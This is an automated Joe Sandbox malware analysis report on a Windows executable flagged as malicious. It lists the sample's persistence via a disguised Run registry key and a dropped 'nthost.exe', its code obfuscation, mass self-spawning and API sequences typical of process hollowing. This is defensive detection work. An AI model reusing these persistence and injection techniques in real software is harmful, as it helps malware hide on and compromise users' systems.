Joe Sandbox Cloud Basic Analysis Report

Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:20.0.0
Analysis ID:33765
Start time:19:10:19
Joe Sandbox Product:CloudBasic
Start date:08.10.2017
Overall analysis duration:0h 9m 58s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:obtG43AWHP.bin (renamed file extension from bin to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed:40
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Detection:MAL
Classification:mal80.evad.winEXE@77/2@0/0
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 230
  • Number of non-executed functions: 519
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 92.9% (good quality ratio 91.2%)
  • Quality average: 86.3%
  • Quality standard deviation: 23%
Cookbook Comments:
  • Stop behavior analysis, all processes terminated
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.


Detection

StrategyScoreRangeReportingDetection
Threshold800 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exevirustotal: Detection: 46%Perma Link
Antivirus detection for submitted fileShow sources
Source: obtG43AWH.exevirustotal: Detection: 46%Perma Link

DDoS:

barindex
Too many similar processes foundShow sources
Source: obtG43AWHP.exeProcess created: 71

Boot Survival:

barindex
Creates an autostart registry keyShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run DX9 C++RTL
Source: C:\Users\user\Desktop\obtG43AWHP.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run DX9 C++RTL
Creates autostart registry keys with suspicious namesShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run DX9 C++RTL

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_030073AC LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_030073AC
PE file contains an invalid checksumShow sources
Source: obtG43AWH.exeStatic PE information: real checksum: 0x8972b should be: 0x81a60
Source: nthost.exe.36.drStatic PE information: real checksum: 0x8972b should be: 0x81a60
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_03005075 push ecx; ret 1_2_03005088
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_00296288 push 00417A1Bh; ret 1_2_002962B3
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_00284190 push 00405941h; ret 1_2_002841D9
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_00294E74 push ecx; mov dword ptr [esp], edx1_2_00294E79
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_002843F8 push 00405B84h; ret 1_2_0028441C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0029744C push 00418BDCh; ret 1_2_00297474
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0028DF4C push 0040F722h; ret 1_2_0028DFBA
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_002849F0 push 0040617Ch; ret 1_2_00284A14
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_002951A0 push 004169ABh; ret 1_2_00295243
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_002965EC push 00417D78h; ret 1_2_00296610
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0028F9FC push ecx; mov dword ptr [esp], edx1_2_0028FA01
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0028DFC4 push 0040F7CCh; ret 1_2_0028E064
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_002843C0 push 00405B4Ch; ret 1_2_002843E4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_002962D8 push 00417A64h; ret 1_2_002962FC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0029519E push 004169ABh; ret 1_2_00295243
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_002962D6 push 00417A64h; ret 1_2_002962FC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_00295250 push 00416A40h; ret 1_2_002952D8
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0028ACD0 push 0040C49Fh; ret 1_2_0028AD37
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0028ADF8 push 0040C584h; ret 1_2_0028AE1C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0028E8E8 push 00410095h; ret 1_2_0028E92D
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_002846D0 push 00405E5Ch; ret 1_2_002846F4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0028ADC0 push 0040C54Ch; ret 1_2_0028ADE4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0029744A push 00418BDCh; ret 1_2_00297474
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0028DF4A push 0040F722h; ret 1_2_0028DFBA
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0028F808 push ecx; mov dword ptr [esp], edx1_2_0028F80D
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_002815C0 push eax; ret 1_2_002815FC
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0028ACCE push 0040C49Fh; ret 1_2_0028AD37
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0028B5EC push 0040CD78h; ret 1_2_0028B610
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0028AB50 push 0040C42Ch; ret 1_2_0028ACC4
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0028E940 push 004100CCh; ret 1_2_0028E964
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0028E120 push 0040F8ACh; ret 1_2_0028E144

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 2_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,2_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 4_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,4_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 6_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,6_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 8_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,8_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 10_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,10_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 12_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,12_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 14_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,14_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 16_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,16_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 18_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,18_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 20_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,20_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 22_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,22_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 24_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,24_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 26_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,26_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 28_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,28_2_00404E08
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 30_2_00404E08 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,30_2_00404E08

System Summary:

barindex
Classification labelShow sources
Source: classification engineClassification label: mal80.evad.winEXE@77/2@0/0
Contains functionality to check free disk spaceShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 2_2_004076D4 GetDiskFreeSpaceA,2_2_004076D4
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 2_2_0040BA10 FreeResource,2_2_0040BA10
Creates files inside the user directoryShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\DirectX
Launches a second explorer.exe instanceShow sources
Source: unknownProcess created: C:\Windows\explorer.exe
PE file has an executable .text section and no other executable sectionShow sources
Source: obtG43AWH.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this applications are using Borland Delphi (Probably coded in Delphi)Show sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\obtG43AWHP.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\obtG43AWHP.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\obtG43AWHP.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\obtG43AWHP.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\obtG43AWHP.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\obtG43AWHP.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\obtG43AWHP.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\obtG43AWHP.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\obtG43AWHP.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\obtG43AWHP.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\obtG43AWHP.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\obtG43AWHP.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\obtG43AWHP.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\obtG43AWHP.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\obtG43AWHP.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\obtG43AWHP.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\obtG43AWHP.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Reads ini filesShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeFile read: C:\Users\user\Desktop\desktop.ini
Reads software policiesShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus (Virustotal or Metascan)Show sources
Source: obtG43AWH.exeVirustotal: hash found
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe'
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe'
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 0
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 0
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 1
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 1
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 2
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 2
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 3
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 3
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 4
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 4
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 5
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 5
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 6
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 6
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 7
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 7
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 8
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 8
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 9
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 9
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 10
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 10
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 11
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 11
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 12
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 12
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 13
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 13
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 14
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 14
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 15
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 15
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 16
Source: unknownProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 16
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe 'C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe' 17 DEL 'C:\Users\user\Desktop\obtG43AWHP.exe'
Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe 'C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe' 17 DEL 'C:\Users\user\Desktop\obtG43AWHP.exe'
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe'
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 0
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 0
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 1
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 1
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 2
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 2
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 3
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 3
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 4
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 4
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 5
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 5
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 6
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 6
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 7
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 7
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 8
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 8
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 9
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 9
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 10
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 10
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 11
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 11
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 12
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 12
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 13
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 13
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 14
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 14
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 15
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 15
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 16
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\Desktop\obtG43AWHP.exe 'C:\Users\user\Desktop\obtG43AWHP.exe' 16
Source: C:\Users\user\Desktop\obtG43AWHP.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe 'C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe' 17 DEL 'C:\Users\user\Desktop\obtG43AWHP.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe 'C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exe' 17 DEL 'C:\Users\user\Desktop\obtG43AWHP.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\DirectX\nthost.exeProcess created: unknown unknown
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Contains functionality to call native functionsShow sources
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 1_2_0027E080 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualAlloc,ReadProcessMemory,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,1_2_0027E080
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 2_2_00417F5C CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualFree,TerminateProcess,2_2_00417F5C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 3_2_0029E080 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualAlloc,ReadProcessMemory,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,3_2_0029E080
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 4_2_00417F5C CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualFree,TerminateProcess,4_2_00417F5C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 5_2_0020E080 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualAlloc,ReadProcessMemory,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,5_2_0020E080
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 6_2_00417F5C CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualFree,TerminateProcess,6_2_00417F5C
Source: C:\Users\user\Desktop\obtG43AWHP.exeCode function: 7_2_0028E080 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualAlloc,ReadProcessMemory,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,7_2_0028E080
